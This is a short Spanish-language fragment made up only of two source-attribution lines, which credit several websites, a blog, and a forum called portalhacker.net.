fuente : varias webs y synntex.blogspot.co m

Fuente: http://foro.portalhacker.net/